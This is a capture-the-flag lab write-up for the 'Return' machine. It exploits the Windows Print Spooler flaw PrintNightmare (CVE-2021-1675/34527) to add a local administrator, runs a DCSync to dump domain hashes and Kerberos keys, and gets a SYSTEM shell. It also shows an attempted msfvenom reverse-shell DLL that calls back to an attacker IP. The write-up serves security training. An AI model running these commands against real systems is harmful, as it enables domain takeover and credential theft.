InfoSec LAB

Return_Privilege_Escalation_4

Created: 7 min read

CVE-2021-1675

a vulnerability classified as critical was found in microsoft windows (Operating System). Affected by this vulnerability is an unknown part of the component Print Spooler. As an impact it is known to affect confidentiality, integrity, and availability. Low privileged users are able to add a printer, and specifically providing a malicious driver for that printer, in which case, results in escalation of privileges, gaining the system level access

Overview of CVE-2021-1675/CVE-2021-34527

The vulnerability takes advantage of the Windows-native service called Print Spooler that is enabled by default on all Windows machines (servers and endpoints)

*evil-winrm* ps c:\tmp> Get-Service Spooler
 
Status   Name               DisplayName
------   ----               -----------
Running  Spooler            Print Spooler

I can test for the Windows Spooler service locally, although there’s been many different sources that indicate the presence of it

exploit (printnightmare)

Invoke-Nightmare.ps1 is a PowerShell implementation of the PrintNightmare LPE exploit for CVE-2021-1675

Exploitation

*evil-winrm* ps c:\tmp> upload Invoke-Nightmare.ps1 C:\tmp\Invoke-Nightmare.ps1
info: Uploading Invoke-Nightmare.ps1 to C:\tmp\Invoke-Nightmare.ps1
 
data: 238080 bytes of 238080 bytes copied
 
info: Upload successful!

I need to first transfer the exploit script

*evil-winrm* ps c:\tmp> . .\Invoke-Nightmare.ps1
*evil-winrm* ps c:\tmp> Invoke-Nightmare
[+] using default new user: adm1n
[+] using default new password: P@ssw0rd
[+] created payload at c:\Users\svc-printer\AppData\Local\Temp\nightmare.dll
[+] using pdriverpath = "c:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\mxdwdrv.dll"
[+] added user  as local administrator
[+] deleting payload from c:\Users\svc-printer\AppData\Local\Temp\nightmare.dll

Import the exploit script and run the exploit cmdlet results in creating and loading a malicious DLL payload for the printer, effectively resulting in creating a local administrator account for the attacker the newly created credential is adm1n:P@ssw0rd

┌──(kali㉿kali)-[~/archive/htb/labs/return]
└─$ evil-winrm -i printer.return.local -u adm1n -p 'P@ssw0rd'                              
 
Evil-WinRM shell v3.4
 
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
 
data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
info: Establishing connection to remote endpoint
 
*evil-winrm* ps c:\Users\adm1n\Documents> whoami /groups
 
GROUP INFORMATION
-----------------
 
Group Name                                 Type             SID          Attributes
========================================== ================ ============ ===============================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                     Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

Successfully WinRM to the target system as the newly created ad1min user As the output shown above, the user is part of the administrators group

At this point, I can just perform the DCSync attack to extract domain credential hashes since I am a local administrator to a DC host

DCSync Attack

┌──(kali㉿kali)-[~/archive/htb/labs/return]
└─$ impacket-secretsdump adm1n:P@ssw0rd@printer.return.local -target-ip $IP -dc-ip $IP 
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xa42289f69adb35cd67d02cc84e69c314
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:34386a771aaca697f447754e4863d38a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
RETURN\PRINTER$:aes256-cts-hmac-sha1-96:8ad926efb270eb570b27b3df1d5974e3510b063dfe4719c936596661dd8044f7
RETURN\PRINTER$:aes128-cts-hmac-sha1-96:c4f7bc24dacca04acf119d1c2ab4cb87
RETURN\PRINTER$:des-cbc-md5:6ddff7cb0b8fb5da
RETURN\PRINTER$:plain_password_hex:d586e0dfba788f299e7f7182834cfb7303eec0aa2a60b4660e3f759d07d358f9367ee5858dd3f8450cd78f8b0e31cb0dfab5376d8d78c461668a912e2445c643883023b2ffccdcf74343d07274fe2e6814b7213e865de94dd5f4f49e0e857084fdeb829ed4b484446c83d612a8a43a3d40adf0d344be12b113ad1c30378cfa0a578944af25c518b58cf1c296576080ff59be2aa5b1ed33c8aadf358a3d24f50423b6f05e735b92d9c84f23455ca875637eacd2b464736e71c2359bc5645a2b9d273d4e1f9b779affdce1caa831bbb887f61801bb21316c234c13007b98587162d309379b691a01de8f7dae789988c311
RETURN\PRINTER$:aad3b435b51404eeaad3b435b51404ee:efb65b83b414ea32e6ed711633871917:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x06243ead9780ed8b9e36d34624aca3eff9eff2a0
dpapi_userkey:0x3dba4981ae9cb884001d7b0b3ffa5d3504fc12b8
[*] NL$KM 
 0000   16 BD CA 34 21 A5 5C AD  51 ED B1 7E 4A 4F 59 B8   ...4!.\.Q..~JOY.
 0010   C3 65 1E 1A 5D 6D 97 82  79 3A 58 A0 FC 2B B5 8B   .e..]m..y:X..+..
 0020   A4 E2 9B CF DD 7B 52 80  99 33 45 4F F1 35 15 DC   .....{R..3EO.5..
 0030   4F 99 B3 A1 CB 55 21 A5  CC F5 27 43 F7 16 AA BC   O....U!...'C....
NL$KM:16bdca3421a55cad51edb17e4a4f59b8c3651e1a5d6d9782793a58a0fc2bb58ba4e29bcfdd7b52809933454ff13515dc4f99b3a1cb5521a5ccf52743f716aabc
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:32db622ed9c00dd1039d8288b0407460:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4e48ce125611add31a32cd79e529964b:::
return.local\svc-printer:1103:aad3b435b51404eeaad3b435b51404ee:c1d26bdcecf44246b5f8653284331a2e:::
adm1n:6106:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
PRINTER$:1000:aad3b435b51404eeaad3b435b51404ee:efb65b83b414ea32e6ed711633871917:::
WIN-BTT8JH9ZU7D$:6101:aad3b435b51404eeaad3b435b51404ee:d5a1639e71af144a93e7921063ba4965:::
WIN-ZDYO0TA5DLN$:6102:aad3b435b51404eeaad3b435b51404ee:8cd5277ac440c3fbe98cd093c1684297:::
WIN-UPQBCAW6CI8$:6103:aad3b435b51404eeaad3b435b51404ee:71c421066ad175a954e5964b82aeb7f1:::
WIN-LJYE51GOLME$:6104:aad3b435b51404eeaad3b435b51404ee:beb45a5ee90ab11f3ce57122ba829d4c:::
WIN-BLVZWHNYLE2$:6105:aad3b435b51404eeaad3b435b51404ee:296bc1d1b7e86076c2adec4ff7775f8a:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:2f7d707eb859ec2c26109953831f54861a0ee47d3e4b16dde7f17009d08297b0
Administrator:aes128-cts-hmac-sha1-96:ef8673c4ba668752432c817dda62af48
Administrator:des-cbc-md5:4f0ee6291aabd338
krbtgt:aes256-cts-hmac-sha1-96:cc6ddaa28d2bb97926dabd1b82845479a97080aad93eddfd2ccf4f2ddf00961a
krbtgt:aes128-cts-hmac-sha1-96:cc5f4a49b6a0cdb71cdea34e84ba2a2e
krbtgt:des-cbc-md5:1086497c1fc1ab8a
return.local\svc-printer:aes256-cts-hmac-sha1-96:6dd6f85d0cf31eb1c01d7aff4e30a58bc5948e6f05e6d88f5cdb57be0208117d
return.local\svc-printer:aes128-cts-hmac-sha1-96:a92bc84131dcd4309431242e8ee9437e
return.local\svc-printer:des-cbc-md5:574cb9a8a8e5cb43
adm1n:aes256-cts-hmac-sha1-96:3a0b9cf60044aba3341f8568b508832e4a9bf8d41b14e9bdb5976d60e8b0aa46
adm1n:aes128-cts-hmac-sha1-96:14ac271e2a68d075291fa956016d54c5
adm1n:des-cbc-md5:bf80f7c1b9439749
PRINTER$:aes256-cts-hmac-sha1-96:8ad926efb270eb570b27b3df1d5974e3510b063dfe4719c936596661dd8044f7
PRINTER$:aes128-cts-hmac-sha1-96:c4f7bc24dacca04acf119d1c2ab4cb87
PRINTER$:des-cbc-md5:2a3df408ea080716
WIN-BTT8JH9ZU7D$:aes256-cts-hmac-sha1-96:41597db8d62a1e39d29298137422439151e47414f145dc3000129a86f6e4b67e
WIN-BTT8JH9ZU7D$:aes128-cts-hmac-sha1-96:95bbe6e763622f64d61a6bc2d2931417
WIN-BTT8JH9ZU7D$:des-cbc-md5:ba6b13fe5b310d68
WIN-ZDYO0TA5DLN$:aes256-cts-hmac-sha1-96:f2656ac81bc9736177d6ad189045dcd3799d3070f7011d8f3114c02506d15534
WIN-ZDYO0TA5DLN$:aes128-cts-hmac-sha1-96:ebff090f26d8e80ddad5c012a68d5840
WIN-ZDYO0TA5DLN$:des-cbc-md5:386dcdb5fec86798
WIN-UPQBCAW6CI8$:aes256-cts-hmac-sha1-96:79042054d4172c8fb9fb4b109899784aac4f0212e98715a94e11b18b18570802
WIN-UPQBCAW6CI8$:aes128-cts-hmac-sha1-96:46bac209bb63287a60a48d4da5edceaf
WIN-UPQBCAW6CI8$:des-cbc-md5:9e01ce89d0ab89d9
WIN-LJYE51GOLME$:aes256-cts-hmac-sha1-96:2954b1d6580fe5d03723e0f93069205e172a96dc1d9d5dc2964a0ce5e8321915
WIN-LJYE51GOLME$:aes128-cts-hmac-sha1-96:0b466f76511caa0e84b3876a57c88a20
WIN-LJYE51GOLME$:des-cbc-md5:a1df45ec85aef423
WIN-BLVZWHNYLE2$:aes256-cts-hmac-sha1-96:0b192467ca1ebe6301976d3cc779a058adafc35613b3c67269bd1087d71100fc
WIN-BLVZWHNYLE2$:aes128-cts-hmac-sha1-96:adf7063eea9e7180360df2bd693312a3
WIN-BLVZWHNYLE2$:des-cbc-md5:e3618fd546086b9e
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

Domain Level Compromise

Shelldrop

┌──(kali㉿kali)-[~/archive/htb/labs/return]
└─$ impacket-psexec adm1n:P@ssw0rd@printer.return.local -dc-ip $IP     
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] Requesting shares on printer.return.local.....
[*] Found writable share ADMIN$
[*] Uploading file SARwpwAm.exe
[*] Opening SVCManager on printer.return.local.....
[*] Creating service SCDQ on printer.return.local.....
[*] Starting service SCDQ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
 
c:\Windows\system32> whoami
nt authority\system
 
c:\Windows\system32> hostname
printer
 
c:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::1a2
   ipv6 address. . . . . . . . . . . : dead:beef::3ca0:8079:2c38:f2ac
   link-local ipv6 address . . . . . : fe80::3ca0:8079:2c38:f2ac%10
   ipv4 address. . . . . . . . . . . : 10.10.11.108
   subnet mask . . . . . . . . . . . : 255.255.254.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%10
                                       10.10.10.2

System Level Compromise

 CVE-2021-34527 Fail

CVE-2021-34527 is the remote variant of CVE-2021-1675, which uses MS-RPRN and MS-PAR via MSRPC to exploit It works by exploiting a logic flaw in the MS-RPRN protocol’s RpcAddPrinterDriverEx function.

There’s been another method through the MS-PAR protocol’s the RpcAsyncAddPrinterDriver function. This is similar to RpcAddPrinterDriverEx, but, has far less constraints and is not limited to domain controllers or Windows 10 systems with non-default settings.

┌──(kali㉿kali)-[~/archive/htb/labs/fuse]
└─$ impacket-rpcdump $IP | grep -iE 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
Protocol: [MS-RPRN]: Print System Remote Protocol

I ran a quick test to see if they are available, and they are indeed available and present on the target system This is much expected as there is a printer service running

┌──(kali㉿kali)-[~/…/htb/labs/return/CVE-2021-34527]
└─$ msfvenom -p windows/x64/powershell_reverse_tcp LHOST=10.10.14.7 LPORT=1234 -f dll -o printnightmare.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 1881 bytes
Final size of dll file: 8704 bytes
Saved as: printnightmare.dll

A malicious DLL payload is generated with msfvenom The Windows Spooler service in the target system will fetch this from a remote SMB server (Kali)

┌──(kali㉿kali)-[~/archive/htb/labs/return]
└─$ nnc 1234                      
listening on [any] 1234 ...

A Netcat listener to receive a session shell upon the target printer executing the malicious DLL

┌──(kali㉿kali)-[~/…/htb/labs/return/CVE-2021-34527]
└─$ simplesmb . -smb2support 
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

This is the remote SMB server that The Windows Spooler service in the target system will fetch the DLL payload from

┌──(kali㉿kali)-[~/…/htb/labs/return/CVE-2021-1675]
└─$ python3 CVE-2021-1675.py return.local/svc-printer@printer.return.local '\\10.10.14.7\smb\printnightmare.dll'
Password: 1edFg43012!!
[*] Connecting to ncacn_np:printer.return.local[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\10.10.14.7\smb\printnightmare.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[*] Stage0: 0
[*] Try 3...
[*] Stage0: 0

Executing the exploit results in failure.

This is very strange because the Spooler service connected back and authenticated to the SMB server running on Kali with the computer account’s credential, which means the system level.

It even fetched the malicious DLL, but no execution..

Interactive Graph View

Backlinks